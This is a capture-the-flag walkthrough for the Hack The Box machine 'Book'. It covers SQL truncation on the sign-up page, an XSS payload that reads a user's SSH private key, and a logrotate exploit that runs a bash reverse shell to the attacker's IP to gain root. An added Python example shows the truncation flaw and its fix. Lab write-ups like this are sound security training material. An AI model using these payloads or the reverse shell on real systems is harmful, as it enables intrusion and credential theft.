HTB Walkthrough Book 10.10.10.176

Summary
Foothold
After the Nmap scan we see there are only 2 ports open. After poking around we discover the sign-up page is vulnerable to a SQL truncation attack.
User
Once we are logged into both the admin and the normal site we discover an XSS vulnerability; through this vulnerability we were able to get the id_rsa key and log in to the box.
Root
After some enumeration we discover there is a vulnerability in the logrotate application; after exploiting it we were able to take over the machine completely.
Enumeration
Nmap
nmap -sC -sV -p- 10.10.10.176

Web
10.10.10.176

http://10.10.10.176/admin

Turns out it's vulnerable to SQL truncation:

Intercepting the sign-up request with Burp so we can edit it and apply the SQL truncation attack:

admin%20%20%20%20%20x&email=admin%40book.htb%20%20%20%20%20%20x&password=12345678

admin@book.htb:12345678
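To show why the padded request above works and how to close the hole, here is an added example (not part of the original walkthrough) that models the MySQL behaviour behind SQL truncation next to a hardened sign-up check. It assumes a VARCHAR(20) email column, a non-strict SQL mode that silently truncates oversized inserts, and a PAD SPACE collation; the class and function names are hypothetical.

```python
from typing import Optional

# Assumed column width of the users.email column (VARCHAR(20)).
COLUMN_WIDTH = 20


def mysql_truncate(value: str) -> str:
    """Non-strict INSERT: characters past the column width are silently dropped."""
    return value[:COLUMN_WIDTH]


def pad_space_equal(a: str, b: str) -> bool:
    """PAD SPACE collation: trailing spaces are ignored in '=' comparisons."""
    return a.rstrip(" ") == b.rstrip(" ")


class VulnerableSignup:
    """Sign-up flow that checks uniqueness on the raw input but stores it truncated."""

    def __init__(self) -> None:
        self.users = {}  # email as stored in the table -> password

    def register(self, email: str, password: str) -> str:
        # Uniqueness check runs on the untruncated input: 'admin@book.htb      x'
        # is not equal to the existing 'admin@book.htb', so the check passes...
        if any(pad_space_equal(stored, email) for stored in self.users):
            return "exists"
        # ...but the row is stored truncated to 'admin@book.htb      ', which
        # PAD SPACE compares equal to the real admin address at login time.
        self.users[mysql_truncate(email)] = password
        return "ok"

    def login(self, email: str, password: str) -> bool:
        return any(pad_space_equal(stored, email) and pw == password
                   for stored, pw in self.users.items())


class HardenedSignup:
    """Normalises first, enforces the column length, then compares exactly."""

    def __init__(self) -> None:
        self.users = {}

    @staticmethod
    def normalize(email: str) -> Optional[str]:
        email = email.strip().lower()
        if len(email) > COLUMN_WIDTH or " " in email or "@" not in email:
            return None  # reject rather than let the database truncate
        return email

    def register(self, email: str, password: str) -> str:
        key = self.normalize(email)
        if key is None:
            return "rejected"
        if key in self.users:  # exact match on the value that will be stored
            return "exists"
        self.users[key] = password
        return "ok"
```

In a real deployment the same guarantees come from STRICT_TRANS_TABLES (oversized inserts error out), a UNIQUE index on the normalised column, and server-side length validation before the INSERT.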
XSS attack
10.10.10.176/admin

10.10.10.176


<script> x=new XMLHttpRequest; x.onload=function(){ document.write(this.responseText.fontsize(1)) }; x.open("GET","file:///home/reader/.ssh/id_rsa"); x.send(); </script>
10.10.10.176/admin

open the collections
and we get our rsa key:

Note: of course we did some more enumeration with our LFI first; that is why we know we need reader as the user.
chmod 600 id_rsa


Privilege Escalation
After some enumeration it turns out we found the following vulnerability:
https://www.exploit-db.com/exploits/47466
compile exploit:
gcc -o exploit exploit.c
create a bash script with a reverse shell:
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.25/443 0>&1
nc -lvp 443
./exploit -p shell.sh /home/reader/backups/access.log
To speed things up a bit, I log in with another shell and execute the following command to trigger the log rotation:
echo rotateme >> /home/reader/backups/access.log

The shell was unstable, so since there is an id_rsa key I decided to grab that one when the root shell popped up.

chmod 600 root_id
ssh -i root_id root@10.10.10.176

Made by s3cwalk
Disclaimer: Please use our posts for educational purposes only. Wrong usage could make you end up in jail.